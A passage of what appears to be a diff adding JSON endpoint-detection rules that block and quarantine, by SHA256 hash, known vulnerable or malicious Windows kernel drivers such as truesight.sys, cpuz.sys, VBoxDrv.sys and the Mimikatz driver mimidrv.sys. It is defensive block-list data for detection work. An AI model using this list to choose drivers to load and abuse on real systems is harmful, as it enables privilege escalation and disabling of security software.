+ "id": "aa6a9347-b685-5cb6-86db-fa8bdddc8064",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967290Z",
+ "creation_date": "2026-03-23T11:45:29.967293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04e88b7717aadc6b56dfa006b9414fc2c899c398d7e003627770e07fed52edfd",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa6b6a9e-6c24-5324-bcdc-127b37318ad0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474923Z",
+ "creation_date": "2026-03-23T11:45:30.474926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6d5d997bbb55b2328c6486595f6f3070a0d03b4dd7c1d2ec1510f43e61b9bcd",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aa86f42d-4c8b-58d6-b70d-b893186e4c2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154264Z",
+ "creation_date": "2026-03-23T11:45:31.154266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "605165377339773fb440d0923fbdc1b12569de46e52b10496bd0fe72774001c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aaa6d240-abec-5f9b-ae9b-9520f10e9d08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825486Z",
+ "creation_date": "2026-03-23T11:45:30.825488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825494Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76d9641d60b8addda570a0f669b521afcc8552c5bbae08f10997cb512e226172",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aaab8eae-21dc-5991-9052-be5c46e7ab59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620141Z",
+ "creation_date": "2026-03-23T11:45:29.620143Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620149Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b97f870c501714fa453cf18ae8a30c87d08ff1e6d784afdbb0121aea3da2dc28",
+ "comment": "Intel vulnerable drivers (aka semav6msr.sys and piddrv64.sys) [https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aab1141e-826a-5bd2-b087-723314de727f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829014Z",
+ "creation_date": "2026-03-23T11:45:31.829017Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829025Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13f91297fe2a1a582483c186dbc70d7dbaa53802d639584c1f809eb73dfa3604",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aad3455c-7963-5cfd-8697-e88d53045f61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807408Z",
+ "creation_date": "2026-03-23T11:45:31.807410Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807416Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b59418c8276ece28f801fd2566c230cd66a2ab5b7b200de4743e495f5a772b34",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aad96b9f-4f01-58f9-91c9-037335bbd4c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149451Z",
+ "creation_date": "2026-03-23T11:45:31.149454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad5ddf3ea6ccdd15e056c8f0a6cbda25c68db0780307a7f35aaf19a7a11b4b2d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aadb2840-b4b9-5438-ba43-e17b115231a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815916Z",
+ "creation_date": "2026-03-23T11:45:31.815918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "accff182f5536f07e09f5b618bd22b0fa5c91f7a29e248dca0a910272d2fe26e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aaddc46a-5ded-544c-adae-a45e0d9d0c7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608172Z",
+ "creation_date": "2026-03-23T11:45:29.608174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608179Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "353aad3d49624aa250019ca2ced8983c7726f500f89165342683555a7ccfda42",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aae9c26a-ee13-5a58-9f3d-87b3df71199a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979499Z",
+ "creation_date": "2026-03-23T11:45:29.979501Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4734a0a5d88f44a4939b8d812364cab6ca5f611b9b8ceebe27df6c1ed3a6d8a4",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aaf4d2ab-42b1-56c4-b7e5-53fcb455480a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490191Z",
+ "creation_date": "2026-03-23T11:45:31.490193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b717e36d39419311eb5046d6239adf4d4bb3d940a80b977456f05ea63a6fe46b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aafe6b63-a23a-53dc-8fc0-97ef6a80f6ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141629Z",
+ "creation_date": "2026-03-23T11:45:31.141631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd5eff8c4331b7fa1f066deb4524af3681539544327bd1134f06697943f8d379",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aafff0d5-e908-5e7f-8f58-07ad62346a90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145038Z",
+ "creation_date": "2026-03-23T11:45:32.145040Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc2606740e4648c3732541db929f2e02ea8567520d35de57c671e93c71e632f3",
+ "comment": "Vulnerable Kernel Driver (aka dellinstrumentation.sys) [https://www.loldrivers.io/drivers/86b9c8d6-9c59-4fd4-befd-ab9a36a19e36/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab16375b-b57a-5c79-826c-a211bbf8acf8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978843Z",
+ "creation_date": "2026-03-23T11:45:29.978845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "641490e28b2a1ee223238f5d969b5abf60a1089afe597c4251b285449e6b3b04",
+ "comment": "Vulnerable Kernel Driver (aka speedfan.sys) [https://www.loldrivers.io/drivers/137daca4-0d7b-48aa-8574-f7eb6ad02526/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab1ca660-74ba-55e9-b571-a1cc9450dbc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471018Z",
+ "creation_date": "2026-03-23T11:45:30.471022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9914ac1acbdc493d78c289bd185c301498c312602cabfcae8aa86cecb9fd14c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab20824e-23cf-5d11-bd45-4883a7474d70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819676Z",
+ "creation_date": "2026-03-23T11:45:31.819680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7506436dac00fddc3c1a39cc9ccd2030aec68d32434470397d7bd10fc12e091f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab2d6424-d24f-5435-a2e9-96ec1b0f619b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610066Z",
+ "creation_date": "2026-03-23T11:45:29.610068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e16a01ef44e4c56e87abfbe03b2989b0391b172c3ec162783ad640be65ab961",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab323f2d-36fb-5ab4-abb1-9dc42bb78b8f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485288Z",
+ "creation_date": "2026-03-23T11:45:31.485292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac3a4d715589062cac8369ce06f5be060a6bc2fe5d960c8e52bfc755a64792b9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab339e5d-1d36-5830-bc6f-7f19205cf25c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822209Z",
+ "creation_date": "2026-03-23T11:45:30.822211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822217Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcf3c0762d6600506ff3b2f13ac6d978041b0b50131b3a564a558611dd3b96df",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab3b1d48-00a7-5317-9a79-eedba87a0815",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823106Z",
+ "creation_date": "2026-03-23T11:45:30.823108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b57569aaa0f4789d9642dd2189b0a82466b80ad32ff35f88127210ed105fe57",
+ "comment": "Vulnerable Kernel Driver (aka atlAccess.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab49e97c-313e-59e1-ae4a-bea5d7b46d6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148312Z",
+ "creation_date": "2026-03-23T11:45:31.148314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33d1b153cc8f762d850b83d94325a829e0e00aef12b8c64e2543bbd774daebe2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab577ce4-9242-5972-97e7-9f2263b95466",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
